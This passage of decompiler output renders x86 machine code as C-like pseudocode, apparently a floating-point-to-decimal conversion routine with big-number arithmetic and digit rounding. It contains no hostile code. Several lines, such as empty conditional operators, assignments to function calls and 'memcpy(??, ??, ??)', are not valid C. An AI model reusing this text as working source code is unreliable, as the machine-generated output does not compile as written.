                                                                    																									asm("fxch st0, st1");
                                                                    																									 *(__eax - 1) = __dl;
                                                                    																									asm("fcomi st0, st1");
                                                                    																									if(__eflags > 0) {
                                                                    																										st0 = __fp0;
                                                                    																										goto L277;
                                                                    																									} else {
                                                                    																										continue;
                                                                    																									}
                                                                    																								}
                                                                    																								goto L110;
                                                                    																							}
                                                                    																							st0 = __fp0;
                                                                    																							st0 = __fp0;
                                                                    																							__edx =  *(__eax - 1) & 0x000000ff;
                                                                    																							L68:
                                                                    																							__esi = _v60;
                                                                    																							__ebx = _v96;
                                                                    																							__ecx = __eax;
                                                                    																							__esi = _v60 + 1;
                                                                    																							__eflags = __esi;
                                                                    																							_v136 = __esi;
                                                                    																							goto L69;
                                                                    																						} else {
                                                                    																							st0 = __fp0;
                                                                    																							L277:
                                                                    																							__esi = _v60;
                                                                    																							asm("fldz");
                                                                    																							__ebx = _v96;
                                                                    																							_v96 = __eax;
                                                                    																							__esi = _v60 + 1;
                                                                    																							__eflags = __esi;
                                                                    																							asm("fucomi st0, st1");
                                                                    																							_v136 = __esi;
                                                                    																							if(__eflags != 0) {
                                                                    																								st0 = __fp0;
                                                                    																								st0 = __fp0;
                                                                    																								goto L227;
                                                                    																							} else {
                                                                    																								asm("fcomip st0, st1");
                                                                    																								st0 = __fp0;
                                                                    																								if(__eflags != 0) {
                                                                    																									goto L227;
                                                                    																								} else {
                                                                    																									_v144 = 0;
                                                                    																								}
                                                                    																							}
                                                                    																						}
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																		} else {
                                                                    																			goto L58;
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    														} else {
                                                                    															L52:
                                                                    															__edx = _v108;
                                                                    															__eax = 2;
                                                                    															__eflags = __edx;
                                                                    															__eax =  >=  ? __edx : 2;
                                                                    															__esi = __esi & 0x00000008;
                                                                    															__eflags = __esi;
                                                                    															_v108 = 2;
                                                                    															__edx =  >=  ? __edx : 2;
                                                                    															if(__esi == 0) {
                                                                    																L129:
                                                                    																__ecx = _v92;
                                                                    																__eflags = _v92;
                                                                    																if(_v92 < 0) {
                                                                    																	L140:
                                                                    																	__eax = _v84;
                                                                    																	__eflags = _v84;
                                                                    																	if(_v84 != 0) {
                                                                    																		L80:
                                                                    																		__eax = _v140;
                                                                    																		__edx = _v92;
                                                                    																		__edi = __edi - __ebx;
                                                                    																		__ecx = __edi + 1;
                                                                    																		__eax =  *(_v140 + 4);
                                                                    																		__edx = _v92 - __edi;
                                                                    																		_v32 = __ecx;
                                                                    																		__eflags = _v92 - __edi - __eax;
                                                                    																		if(_v92 - __edi >= __eax) {
                                                                    																			L178:
                                                                    																			__eflags = _v164 - 1;
                                                                    																			if(_v164 <= 1) {
                                                                    																				goto L84;
                                                                    																			} else {
                                                                    																				goto L179;
                                                                    																			}
                                                                    																			goto L110;
                                                                    																		} else {
                                                                    																			L81:
                                                                    																			__esi = _v164;
                                                                    																			_t186 = __esi - 3; // -3
                                                                    																			__edx = _t186;
                                                                    																			__edx = _t186 & 0xfffffffd;
                                                                    																			__eflags = __edx;
                                                                    																			if(__edx == 0) {
                                                                    																				goto L178;
                                                                    																			} else {
                                                                    																				_v92 = _v92 - __eax;
                                                                    																				__ecx = _v92 - __eax + 1;
                                                                    																				__eflags = __esi - 1;
                                                                    																				__esi = _v124;
                                                                    																				__edx = __edx & 0xffffff00 | __eflags > 0x00000000;
                                                                    																				_v32 = __ecx;
                                                                    																				__eflags = __esi;
                                                                    																				__eax = __eax & 0xffffff00 | __esi > 0x00000000;
                                                                    																				__eflags = __dl & __al;
                                                                    																				if((__dl & __al) == 0) {
                                                                    																					L84:
                                                                    																					__eax = _v88;
                                                                    																					_v100 = _v100 + __ecx;
                                                                    																					__edi = _v76;
                                                                    																					_v92 = __eax;
                                                                    																					__eax = __eax + __ecx;
                                                                    																					__eflags = __eax;
                                                                    																					_v88 = __eax;
                                                                    																				} else {
                                                                    																					__eflags = __ecx - __esi;
                                                                    																					if(__ecx > __esi) {
                                                                    																						L179:
                                                                    																						__eax = _v124;
                                                                    																						__esi = _v76;
                                                                    																						__eax = _v124 - 1;
                                                                    																						__eflags = __esi - __eax;
                                                                    																						if(__esi < __eax) {
                                                                    																							__edx = __eax;
                                                                    																							__edi = 0;
                                                                    																							__edx = __eax - _v76;
                                                                    																							_v76 = __eax;
                                                                    																							_v112 = _v112 + __eax - _v76;
                                                                    																						} else {
                                                                    																							__esi = __esi - __eax;
                                                                    																							__eflags = __esi;
                                                                    																							__edi = __esi;
                                                                    																						}
                                                                    																						__eax = _v124;
                                                                    																						__eflags = __eax;
                                                                    																						if(__eax < 0) {
                                                                    																							_v32 = 0;
                                                                    																							_v88 = _v88 - _v124;
                                                                    																							_v92 = _v88 - _v124;
                                                                    																						} else {
                                                                    																							__esi = _v88;
                                                                    																							_v100 = _v100 + __eax;
                                                                    																							_v32 = __eax;
                                                                    																							__eax = __eax + __esi;
                                                                    																							_v92 = __esi;
                                                                    																							_v88 = __eax;
                                                                    																						}
                                                                    																					} else {
                                                                    																						goto L84;
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																		}
                                                                    																		__eax = E00307870(1);
                                                                    																		_v84 = 1;
                                                                    																		__esi = __eax;
                                                                    																		goto L86;
                                                                    																	} else {
                                                                    																		__eax = _v88;
                                                                    																		__edi = _v76;
                                                                    																		__esi = 0;
                                                                    																		_v92 = _v88;
                                                                    																		L86:
                                                                    																		__ecx = _v92;
                                                                    																		__eflags = __ecx;
                                                                    																		if(__ecx > 0) {
                                                                    																			__edx = _v100;
                                                                    																			__eflags = __edx;
                                                                    																			if(__edx > 0) {
                                                                    																				__eflags = __ecx - __edx;
                                                                    																				__eax = __edx;
                                                                    																				__eax =  <=  ? __ecx : __edx;
                                                                    																				_v88 = _v88 - __eax;
                                                                    																				__ecx = __ecx - __eax;
                                                                    																				__edx = __edx - __eax;
                                                                    																				__eflags = __edx;
                                                                    																				_v32 = __eax;
                                                                    																				_v92 = __ecx;
                                                                    																				_v100 = __edx;
                                                                    																			}
                                                                    																		}
                                                                    																		__eax = _v76;
                                                                    																		__eflags = _v76;
                                                                    																		if(_v76 != 0) {
                                                                    																			__eax = _v84;
                                                                    																			__eflags = _v84;
                                                                    																			if(_v84 == 0) {
                                                                    																				__eax = _v76;
                                                                    																				goto L204;
                                                                    																			} else {
                                                                    																				__eflags = __edi;
                                                                    																				if(__edi > 0) {
                                                                    																					__eax = E00307AD0(__esi, __edi);
                                                                    																					_v184 = __ebp;
                                                                    																					 *__esp = __eax;
                                                                    																					__esi = __eax;
                                                                    																					__eax = E00307920();
                                                                    																					 *__esp = __ebp;
                                                                    																					_v132 = __eax;
                                                                    																					__eax = E00307720();
                                                                    																					__ebp = _v132;
                                                                    																				}
                                                                    																				__eax = _v76;
                                                                    																				__eax = _v76 - __edi;
                                                                    																				__eflags = __eax;
                                                                    																				if(__eax != 0) {
                                                                    																					L204:
                                                                    																					__ebp = __eax;
                                                                    																				}
                                                                    																			}
                                                                    																		}
                                                                    																		__eax = E00307870(1);
                                                                    																		__eflags = __ebx - 1;
                                                                    																		__edi = _v112;
                                                                    																		__ebx = __ebx & 0xffffff00 | __ebx == 0x00000001;
                                                                    																		__eflags = _v164 - 1;
                                                                    																		_v132 = __eax;
                                                                    																		__ecx = __eax;
                                                                    																		__ebx = __ebx & __eax;
                                                                    																		__eflags = __edi;
                                                                    																		if(__edi > 0) {
                                                                    																			_v132 = E00307AD0(__ecx, __edi);
                                                                    																			__eflags = __bl;
                                                                    																			if(__bl != 0) {
                                                                    																				__eax = _v140;
                                                                    																				__eax =  *(_v140 + 4);
                                                                    																				__eax =  *(_v140 + 4) + 1;
                                                                    																				__eflags = _v148 - __eax;
                                                                    																				if(_v148 <= __eax) {
                                                                    																					goto L146;
                                                                    																				} else {
                                                                    																					goto L177;
                                                                    																				}
                                                                    																			} else {
                                                                    																				L146:
                                                                    																				__edi = 0;
                                                                    																				__eflags = 0;
                                                                    																				goto L147;
                                                                    																			}
                                                                    																			goto L304;
                                                                    																		} else {
                                                                    																			__edi = 0;
                                                                    																			__eflags = __bl;
                                                                    																			if(__bl != 0) {
                                                                    																				__eax = _v140;
                                                                    																				__eax =  *(_v140 + 4);
                                                                    																				__eax =  *(_v140 + 4) + 1;
                                                                    																				__eflags = __eax - _v148;
                                                                    																				if(__eax < _v148) {
                                                                    																					L177:
                                                                    																					_v88 = _v88 + 1;
                                                                    																					__edi = 1;
                                                                    																					_v100 = _v100 + 1;
                                                                    																				}
                                                                    																			}
                                                                    																			__eax = _v112;
                                                                    																			__ebx = 0x1f;
                                                                    																			__eflags = _v112;
                                                                    																			if(_v112 != 0) {
                                                                    																				L147:
                                                                    																				__ebx = _v132;
                                                                    																				__eax =  *(__ebx + 0x10);
                                                                    																				asm("bsr ebx, [ebx+eax*4+0x10]");
                                                                    																				__ebx = __ebx ^ 0x0000001f;
                                                                    																			}
                                                                    																		}
                                                                    																		__ebx = __ebx - _v100;
                                                                    																		__edx = _v88;
                                                                    																		__ebx = __ebx - 4;
                                                                    																		__ebx = __ebx & 0x0000001f;
                                                                    																		__edx = _v88 + __ebx;
                                                                    																		_v32 = __ebx;
                                                                    																		__eax = __ebx;
                                                                    																		__eflags = __edx;
                                                                    																		if(__edx > 0) {
                                                                    																			 *__esp = __ebp;
                                                                    																			_v184 = __edx;
                                                                    																			__ebp = E00307CB0();
                                                                    																			__eax = _v32;
                                                                    																		}
                                                                    																		__eax = __eax + _v100;
                                                                    																		__eflags = __eax;
                                                                    																		if(__eax > 0) {
                                                                    																			_v184 = __eax;
                                                                    																			__eax = _v132;
                                                                    																			 *__esp = _v132;
                                                                    																			_v132 = E00307CB0();
                                                                    																		}
                                                                    																		__eax = _v72;
                                                                    																		__eflags = _v164 - 2;
                                                                    																		__edx = __edx & 0xffffff00 | _v164 - 0x00000002 > 0x00000000;
                                                                    																		__eflags = _v72;
                                                                    																		if(_v72 != 0) {
                                                                    																			__eax = _v132;
                                                                    																			 *__esp = __ebp;
                                                                    																			_v148 = __dl;
                                                                    																			_v184 = _v132;
                                                                    																			__eax = E00307DF0();
                                                                    																			__edx = _v148 & 0x000000ff;
                                                                    																			__eflags = __eax;
                                                                    																			if(__eax >= 0) {
                                                                    																				goto L102;
                                                                    																			} else {
                                                                    																				 *__esp = __ebp;
                                                                    																				__eax = _v80;
                                                                    																				_v180 = 0;
                                                                    																				_v184 = 0xa;
                                                                    																				__eax = _v80 - 1;
                                                                    																				_v140 = _v80 - 1;
                                                                    																				__eax = E00307790();
                                                                    																				__edx = _v148 & 0x000000ff;
                                                                    																				__ecx = _v84;
                                                                    																				__ebp = __eax;
                                                                    																				__eax = _v64;
                                                                    																				__eflags = __eax;
                                                                    																				__edx = _v148 & 0x000000ff & __eax;
                                                                    																				__eflags = _v84;
                                                                    																				if(_v84 != 0) {
                                                                    																					 *__esp = __esi;
                                                                    																					_v180 = 0;
                                                                    																					_v184 = 0xa;
                                                                    																					_v148 = __dl;
                                                                    																					__eax = E00307790();
                                                                    																					__edx = _v148 & 0x000000ff;
                                                                    																					__esi = __eax;
                                                                    																					__eflags = __dl;
                                                                    																					if(__dl != 0) {
                                                                    																						goto L274;
                                                                    																					} else {
                                                                    																						__eax = _v80;
                                                                    																						_v136 = _v80;
                                                                    																						__eax = _v64;
                                                                    																						_v124 = _v64;
                                                                    																						goto L149;
                                                                    																					}
                                                                    																				} else {
                                                                    																					__eflags = __dl;
                                                                    																					if(__dl != 0) {
                                                                    																						L274:
                                                                    																						__eax = _v140;
                                                                    																						_v80 = _v140;
                                                                    																						__eax = _v64;
                                                                    																						_v124 = _v64;
                                                                    																						goto L104;
                                                                    																					} else {
                                                                    																						__eax = _v80;
                                                                    																						_v136 = _v80;
                                                                    																						__eax = _v64;
                                                                    																						_v124 = _v64;
                                                                    																						goto L187;
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																		} else {
                                                                    																			L102:
                                                                    																			__eax = _v124;
                                                                    																			__eflags = _v124;
                                                                    																			if(_v124 > 0) {
                                                                    																				L148:
                                                                    																				_v80 = _v80 + 1;
                                                                    																				_v136 = _v80 + 1;
                                                                    																				__eax = _v84;
                                                                    																				__eflags = _v84;
                                                                    																				if(_v84 == 0) {
                                                                    																					L187:
                                                                    																					__edi = _v96;
                                                                    																					__ebx = _v124;
                                                                    																					_v164 = __esi;
                                                                    																					_v32 = 1;
                                                                    																					__esi = _v132;
                                                                    																					while(1) {
                                                                    																						_v184 = __esi;
                                                                    																						__edi = __edi + 1;
                                                                    																						 *__esp = __ebp;
                                                                    																						__eax = E00305A50();
                                                                    																						__eax = __eax + 0x30;
                                                                    																						 *(__edi - 1) = __al;
                                                                    																						__eflags = _v32 - __ebx;
                                                                    																						if(_v32 >= __ebx) {
                                                                    																							break;
                                                                    																						}
                                                                    																						__eax = E00307790(__ebp, 0xa, 0);
                                                                    																						_t407 =  &_v32;
                                                                    																						 *_t407 = _v32 + 1;
                                                                    																						__eflags =  *_t407;
                                                                    																						__ebp = __eax;
                                                                    																					}
                                                                    																					_v148 = __eax;
                                                                    																					__esi = _v164;
                                                                    																					__ecx = 0;
                                                                    																					__eflags = 0;
                                                                    																					goto L191;
                                                                    																				} else {
                                                                    																					L149:
                                                                    																					__ebx = __ebx + _v92;
                                                                    																					__eflags = __ebx;
                                                                    																					if(__ebx > 0) {
                                                                    																						 *__esp = __esi;
                                                                    																						_v184 = __ebx;
                                                                    																						__esi = E00307CB0();
                                                                    																					}
                                                                    																					__ebx = __esi;
                                                                    																					__eflags = __edi;
                                                                    																					if(__edi != 0) {
                                                                    																						__eax =  *(__esi + 4);
                                                                    																						__eax = E00307630( *(__esi + 4));
                                                                    																						_t533 = __eax + 0xc; // 0xc
                                                                    																						__ecx = _t533;
                                                                    																						__ebx = __eax;
                                                                    																						__eax =  *(__esi + 0x10);
                                                                    																						 *__esp = _t533;
                                                                    																						__edx = 8 +  *(__esi + 0x10) * 4;
                                                                    																						_t537 = __esi + 0xc; // 0xc
                                                                    																						__eax = _t537;
                                                                    																						_v180 = 8 +  *(__esi + 0x10) * 4;
                                                                    																						_v184 = _t537;
                                                                    																						__eax = memcpy(??, ??, ??);
                                                                    																						 *__esp = __ebx;
                                                                    																						_v184 = 1;
                                                                    																						__ebx = E00307CB0();
                                                                    																					}
                                                                    																					_v32 = 1;
                                                                    																					__eax = _v96;
                                                                    																					_v140 = _v96;
                                                                    																					while(1) {
                                                                    																						__eax = _v132;
                                                                    																						 *__esp = __ebp;
                                                                    																						_v184 = _v132;
                                                                    																						__eax = E00305A50();
                                                                    																						_v184 = __esi;
                                                                    																						 *__esp = __ebp;
                                                                    																						_t337 = __eax + 0x30; // 0x30
                                                                    																						__ecx = _t337;
                                                                    																						_v148 = _t337;
                                                                    																						_v112 = __eax;
                                                                    																						__eax = E00307DF0();
                                                                    																						_v184 = __ebx;
                                                                    																						__edi = __eax;
                                                                    																						__eax = _v132;
                                                                    																						 *__esp = _v132;
                                                                    																						__eax = E00307E40();
                                                                    																						__edx = __eax;
                                                                    																						__eax =  *(__eax + 0xc);
                                                                    																						__eflags = __eax;
                                                                    																						if(__eax != 0) {
                                                                    																							goto L153;
                                                                    																						}
                                                                    																						_v184 = __edx;
                                                                    																						 *__esp = __ebp;
                                                                    																						_v92 = __edx;
                                                                    																						__eax = E00307DF0();
                                                                    																						__edx = _v92;
                                                                    																						_v100 = __eax;
                                                                    																						E00307720(_v92) = _v164;
                                                                    																						__eax = _v164 | _v100;
                                                                    																						__eflags = __eax;
                                                                    																						if(__eax != 0) {
                                                                    																							__eax = _v100;
                                                                    																							goto L154;
                                                                    																						} else {
                                                                    																							__edx = _v152;
                                                                    																							__ecx =  *_v152;
                                                                    																							__edx = __ecx;
                                                                    																							_v100 = __ecx;
                                                                    																							__ecx & 0x00000001 = __ecx & 0x00000001 | _v108;
                                                                    																							__eflags = __ecx & 0x00000001 | _v108;
                                                                    																							if((__ecx & 0x00000001 | _v108) != 0) {
                                                                    																								L154:
                                                                    																								__eflags = __edi;
                                                                    																								if(__edi < 0) {
                                                                    																									L242:
                                                                    																									__edi = _v140;
                                                                    																									__ecx = _v108;
                                                                    																									__edx = _v140 + 1;
                                                                    																									__edi = __edx;
                                                                    																									__eflags = _v108;
                                                                    																									if(_v108 == 0) {
                                                                    																										__eflags = __eax;
                                                                    																										if(__eax <= 0) {
                                                                    																											goto L271;
                                                                    																										} else {
                                                                    																											goto L268;
                                                                    																										}
                                                                    																									} else {
                                                                    																										__eflags = _a16 - 1;
                                                                    																										if(_a16 <= 1) {
                                                                    																											__ecx = _a20;
                                                                    																											__eflags = _a20;
                                                                    																											if(_a20 != 0) {
                                                                    																												goto L244;
                                                                    																											} else {
                                                                    																												__eflags = __eax;
                                                                    																												if(__eax > 0) {
                                                                    																													L268:
                                                                    																													 *__esp = __ebp;
                                                                    																													_v184 = 1;
                                                                    																													__ebp = E00307CB0();
                                                                    																													__eax = _v132;
                                                                    																													__eflags = E00307DF0(__ebp, _v132);
                                                                    																													if(__eflags <= 0) {
                                                                    																														if(__eflags != 0) {
                                                                    																															L297:
                                                                    																															_v108 = 0x20;
                                                                    																															goto L271;
                                                                    																														} else {
                                                                    																															__eflags = _v148 & 0x00000001;
                                                                    																															if((_v148 & 0x00000001) != 0) {
                                                                    																																goto L269;
                                                                    																															} else {
                                                                    																																goto L297;
                                                                    																															}
                                                                    																														}
                                                                    																													} else {
                                                                    																														L269:
                                                                    																														__eflags = _v148 - 0x39;
                                                                    																														if(_v148 == 0x39) {
                                                                    																															goto L273;
                                                                    																														} else {
                                                                    																															__eax = _v112;
                                                                    																															_v108 = 0x20;
                                                                    																															__eax = _v112 + 0x31;
                                                                    																															__eflags = __eax;
                                                                    																															_v148 = __eax;
                                                                    																															L271:
                                                                    																															__eflags = _a16 - 1;
                                                                    																															if(_a16 <= 1) {
                                                                    																																__ecx = __esi;
                                                                    																																__esi = __ebx;
                                                                    																																__ebx = _a20;
                                                                    																																__eflags = _a20;
                                                                    																																if(_a20 == 0) {
                                                                    																																	__eax = _v108;
                                                                    																																	_v144 = _v108;
                                                                    																																} else {
                                                                    																																	_v144 = 0x10;
                                                                    																																}
                                                                    																															} else {
                                                                    																																goto L272;
                                                                    																															}
                                                                    																															goto L250;
                                                                    																														}
                                                                    																													}
                                                                    																												} else {
                                                                    																													__ecx = __esi;
                                                                    																													__esi = __ebx;
                                                                    																													goto L250;
                                                                    																												}
                                                                    																											}
                                                                    																										} else {
                                                                    																											L244:
                                                                    																											__eflags = _v108 - 2;
                                                                    																											if(_v108 == 2) {
                                                                    																												L272:
                                                                    																												__ecx = __esi;
                                                                    																												_v144 = 0x10;
                                                                    																												__esi = __ebx;
                                                                    																												goto L250;
                                                                    																											} else {
                                                                    																												__edi = __esi;
                                                                    																												__esi = __edx;
                                                                    																												while(1) {
                                                                    																													__eax = _v132;
                                                                    																													__eax = E00307DF0(_v132, __ebx);
                                                                    																													__ecx = __esi;
                                                                    																													__eflags = __eax;
                                                                    																													if(__eax <= 0) {
                                                                    																														break;
                                                                    																													}
                                                                    																													__eax = _v148 & 0x000000ff;
                                                                    																													 *(__esi - 1) = __al;
                                                                    																													__eax = E00307790(__ebx, 0xa, 0);
                                                                    																													 *__esp = __ebp;
                                                                    																													__eflags = __edi - __ebx;
                                                                    																													_v180 = 0;
                                                                    																													__edi =  ==  ? __eax : __edi;
                                                                    																													_v184 = 0xa;
                                                                    																													_v164 = __eax;
                                                                    																													__ebp = E00307790();
                                                                    																													__eax = _v132;
                                                                    																													 *__esp = __ebp;
                                                                    																													_v184 = _v132;
                                                                    																													__eax = E00305A50();
                                                                    																													__ecx = _v164;
                                                                    																													_v140 = __esi;
                                                                    																													__esi = __esi + 1;
                                                                    																													__eax = __eax + 0x30;
                                                                    																													__eflags = __eax;
                                                                    																													_v148 = __eax;
                                                                    																													__ebx = _v164;
                                                                    																												}
                                                                    																												__eax = _v148;
                                                                    																												__esi = __edi;
                                                                    																												__edi = __ecx;
                                                                    																												__eflags = __eax - 0x39;
                                                                    																												if(__eax == 0x39) {
                                                                    																													goto L273;
                                                                    																												} else {
                                                                    																													__eax = __eax + 1;
                                                                    																													__eflags = __eax;
                                                                    																													_v144 = 0x20;
                                                                    																													__ecx = __esi;
                                                                    																													__esi = __ebx;
                                                                    																													_v148 = __eax;
                                                                    																													L250:
                                                                    																													__ebx = _v140;
                                                                    																													__eax = _v148 & 0x000000ff;
                                                                    																													 *_v140 = __al;
                                                                    																												}
                                                                    																											}
                                                                    																										}
                                                                    																									}
                                                                    																								} else {
                                                                    																									__edi = __edi | _v164;
                                                                    																									__eflags = __edi;
                                                                    																									if(__edi != 0) {
                                                                    																										L157:
                                                                    																										__edi = _v140;
                                                                    																										__edi = _v140 + 1;
                                                                    																										__eflags = __eax;
                                                                    																										if(__eax <= 0) {
                                                                    																											L159:
                                                                    																											__eax = _v148 & 0x000000ff;
                                                                    																											 *(__edi - 1) = __al;
                                                                    																											__eax = _v124;
                                                                    																											__eflags = _v32 - _v124;
                                                                    																											if(_v32 == _v124) {
                                                                    																												__ecx = __esi;
                                                                    																												__esi = __ebx;
                                                                    																												L191:
                                                                    																												__ebx = _v108;
                                                                    																												__eflags = __ebx;
                                                                    																												if(__ebx == 0) {
                                                                    																													 *__esp = __ebp;
                                                                    																													_v184 = 1;
                                                                    																													_v164 = __ecx;
                                                                    																													__ebp = E00307CB0();
                                                                    																													__eax = _v132;
                                                                    																													__eax = E00307DF0(__ebp, _v132);
                                                                    																													__ecx = _v164;
                                                                    																													__eflags = __eax;
                                                                    																													__eax =  *(__edi - 1) & 0x000000ff;
                                                                    																													if(__eflags > 0) {
                                                                    																														goto L195;
                                                                    																													} else {
                                                                    																														if(__eflags != 0) {
                                                                    																															L220:
                                                                    																															__edx = _a16;
                                                                    																															goto L221;
                                                                    																														} else {
                                                                    																															__eflags = _v148 & 0x00000001;
                                                                    																															if((_v148 & 0x00000001) != 0) {
                                                                    																																goto L195;
                                                                    																															} else {
                                                                    																																goto L220;
                                                                    																															}
                                                                    																														}
                                                                    																													}
                                                                    																												} else {
                                                                    																													__edx = _a16;
                                                                    																													__eax =  *(__edi - 1) & 0x000000ff;
                                                                    																													__eflags = __ebx - 2;
                                                                    																													if(__ebx == 2) {
                                                                    																														L221:
                                                                    																														__eflags = __edx - 1;
                                                                    																														if(__edx <= 1) {
                                                                    																															__ebx = _a20;
                                                                    																															__edx = 0x10;
                                                                    																															__eflags = _a20;
                                                                    																															__edx =  ==  ? _v144 : 0x10;
                                                                    																															_v144 =  ==  ? _v144 : 0x10;
                                                                    																														} else {
                                                                    																															_v144 = 0x10;
                                                                    																														}
                                                                    																														goto L201;
                                                                    																													} else {
                                                                    																														__eflags = __edx - 1;
                                                                    																														if(__edx > 1) {
                                                                    																															L195:
                                                                    																															__ebx = _v96;
                                                                    																															goto L198;
                                                                    																														} else {
                                                                    																															__edx = _a20;
                                                                    																															__eflags = _a20;
                                                                    																															if(_a20 == 0) {
                                                                    																																while(1) {
                                                                    																																	L201:
                                                                    																																	__edx = __edi - 1;
                                                                    																																	__eflags = __al - 0x30;
                                                                    																																	if(__al != 0x30) {
                                                                    																																		break;
                                                                    																																	}
                                                                    																																	__eax =  *(__edi - 2) & 0x000000ff;
                                                                    																																	__edi = __edx;
                                                                    																																}
                                                                    																															} else {
                                                                    																																goto L195;
                                                                    																															}
                                                                    																														}
                                                                    																													}
                                                                    																												}
                                                                    																											} else {
                                                                    																												__eax = E00307790(__ebp, 0xa, 0);
                                                                    																												_v180 = 0;
                                                                    																												_v184 = 0xa;
                                                                    																												__ebp = __eax;
                                                                    																												 *__esp = __esi;
                                                                    																												__eflags = __esi - __ebx;
                                                                    																												if(__esi == __ebx) {
                                                                    																													__eax = E00307790();
                                                                    																													__esi = __eax;
                                                                    																													__ebx = __eax;
                                                                    																												} else {
                                                                    																													__eax = E00307790();
                                                                    																													 *__esp = __ebx;
                                                                    																													_v180 = 0;
                                                                    																													__esi = __eax;
                                                                    																													_v184 = 0xa;
                                                                    																													__ebx = E00307790();
                                                                    																												}
                                                                    																												_t331 =  &_v32;
                                                                    																												 *_t331 = _v32 + 1;
                                                                    																												__eflags =  *_t331;
                                                                    																												_v140 = __edi;
                                                                    																												continue;
                                                                    																											}
                                                                    																										} else {
                                                                    																											__eflags = _v108 - 2;
                                                                    																											if(_v108 != 2) {
                                                                    																												__eflags = _v148 - 0x39;
                                                                    																												if(_v148 == 0x39) {
                                                                    																													goto L273;
                                                                    																												} else {
                                                                    																													__eax = _v148 & 0x000000ff;
                                                                    																													__edx = _v140;
                                                                    																													__ecx = __esi;
                                                                    																													_v144 = 0x20;
                                                                    																													__esi = __ebx;
                                                                    																													__eax = (_v148 & 0x000000ff) + 1;
                                                                    																													 *_v140 = __al;
                                                                    																												}
                                                                    																											} else {
                                                                    																												goto L159;
                                                                    																											}
                                                                    																										}
                                                                    																									} else {
                                                                    																										__edi = _v152;
                                                                    																										__eflags =  *__edi & 0x00000001;
                                                                    																										if(( *__edi & 0x00000001) == 0) {
                                                                    																											goto L242;
                                                                    																										} else {
                                                                    																											goto L157;
                                                                    																										}
                                                                    																									}
                                                                    																								}
                                                                    																							} else {
                                                                    																								__edx = _v140;
                                                                    																								__eflags = _v148 - 0x39;
                                                                    																								__ecx = __edi;
                                                                    																								__edi = _v140 + 1;
                                                                    																								if(_v148 == 0x39) {
                                                                    																									L273:
                                                                    																									__eax = _v140;
                                                                    																									__ecx = __esi;
                                                                    																									__esi = __ebx;
                                                                    																									__ebx = _v96;
                                                                    																									 *_v140 = 0x39;
                                                                    																									__eax = 0x39;
                                                                    																									while(1) {
                                                                    																										L198:
                                                                    																										__edx = __edi - 1;
                                                                    																										__eflags = __al - 0x39;
                                                                    																										if(__al != 0x39) {
                                                                    																											break;
                                                                    																										}
                                                                    																										__eflags = __edx - __ebx;
                                                                    																										if(__edx == __ebx) {
                                                                    																											__eax = _v96;
                                                                    																											_v136 = _v136 + 1;
                                                                    																											_v144 = 0x20;
                                                                    																											 *_v96 = 0x31;
                                                                    																										} else {
                                                                    																											__eax =  *(__edx - 1) & 0x000000ff;
                                                                    																											__edi = __edx;
                                                                    																											continue;
                                                                    																										}
                                                                    																										goto L170;
                                                                    																									}
                                                                    																									__eax = __eax + 1;
                                                                    																									_v144 = 0x20;
                                                                    																									 *__edx = __al;
                                                                    																								} else {
                                                                    																									__eflags = __ecx;
                                                                    																									if(__ecx <= 0) {
                                                                    																										__eflags = _a16 - 1;
                                                                    																										if(_a16 <= 1) {
                                                                    																											__eflags = _a20;
                                                                    																											__edx = 0x10;
                                                                    																											__eax =  !=  ? 0x10 : __eax;
                                                                    																										} else {
                                                                    																											__eax = 0x10;
                                                                    																										}
                                                                    																									} else {
                                                                    																										__eax = _v112;
                                                                    																										__eax = _v112 + 0x31;
                                                                    																										__eflags = __eax;
                                                                    																										_v148 = __eax;
                                                                    																										__eax = 0x20;
                                                                    																									}
                                                                    																									__ecx = _v148 & 0x000000ff;
                                                                    																									__edx = _v140;
                                                                    																									_v144 = __eax;
                                                                    																									 *_v140 = __cl;
                                                                    																									__ecx = __esi;
                                                                    																									__esi = __ebx;
                                                                    																								}
                                                                    																							}
                                                                    																						}
                                                                    																						goto L170;
                                                                    																						L153:
                                                                    																						__eax = E00307720(__edx);
                                                                    																						__eax = 1;
                                                                    																						goto L154;
                                                                    																					}
                                                                    																				}
                                                                    																				L170:
                                                                    																				__eax = _v132;
                                                                    																				_v164 = __ecx;
                                                                    																				__eax = E00307720(_v132);
                                                                    																				__eflags = __esi;
                                                                    																				if(__esi == 0) {
                                                                    																					__ebx = _v96;
                                                                    																					_v96 = __edi;
                                                                    																				} else {
                                                                    																					__ecx = _v164;
                                                                    																					__eflags = __ecx;
                                                                    																					if(__ecx == 0) {
                                                                    																						L275:
                                                                    																						__ebx = _v96;
                                                                    																						_v96 = __edi;
                                                                    																						goto L109;
                                                                    																					} else {
                                                                    																						__eflags = __ecx - __esi;
                                                                    																						if(__ecx == __esi) {
                                                                    																							goto L275;
                                                                    																						} else {
                                                                    																							__eax = E00307720(__ecx);
                                                                    																							__ebx = _v96;
                                                                    																							_v96 = __edi;
                                                                    																							goto L109;
                                                                    																						}
                                                                    																					}
                                                                    																					goto L304;
                                                                    																				}
                                                                    																			} else {
                                                                    																				__eflags = __dl;
                                                                    																				if(__dl == 0) {
                                                                    																					goto L148;
                                                                    																				} else {
                                                                    																					L104:
                                                                    																					__eax = _v124;
                                                                    																					__eflags = _v124;
                                                                    																					if(_v124 != 0) {
                                                                    																						goto L144;
                                                                    																					} else {
                                                                    																						__eax = _v132;
                                                                    																						__eax = E00307790(_v132, 5, 0);
                                                                    																						 *__esp = __ebp;
                                                                    																						_v184 = __eax;
                                                                    																						_v132 = __eax;
                                                                    																						__eax = E00307DF0();
                                                                    																						__eflags = __eax;
                                                                    																						if(__eax <= 0) {
                                                                    																							goto L144;
                                                                    																						} else {
                                                                    																							__eax = _v80;
                                                                    																							__ebx = _v96;
                                                                    																							__eax = _v80 + 2;
                                                                    																							__eflags = __eax;
                                                                    																							_v136 = __eax;
                                                                    																							goto L107;
                                                                    																						}
                                                                    																					}
                                                                    																					goto L108;
                                                                    																				}
                                                                    																			}
                                                                    																		}
                                                                    																		goto L110;
                                                                    																	}
                                                                    																	goto L304;
                                                                    																} else {
                                                                    																	__esi = _v140;
                                                                    																	__eax = _v80;
                                                                    																	__eflags =  *((intOrPtr*)(__esi + 0x14)) - __eax;
                                                                    																	if( *((intOrPtr*)(__esi + 0x14)) < __eax) {
                                                                    																		goto L140;
                                                                    																	} else {
                                                                    																		__edx = _v136;
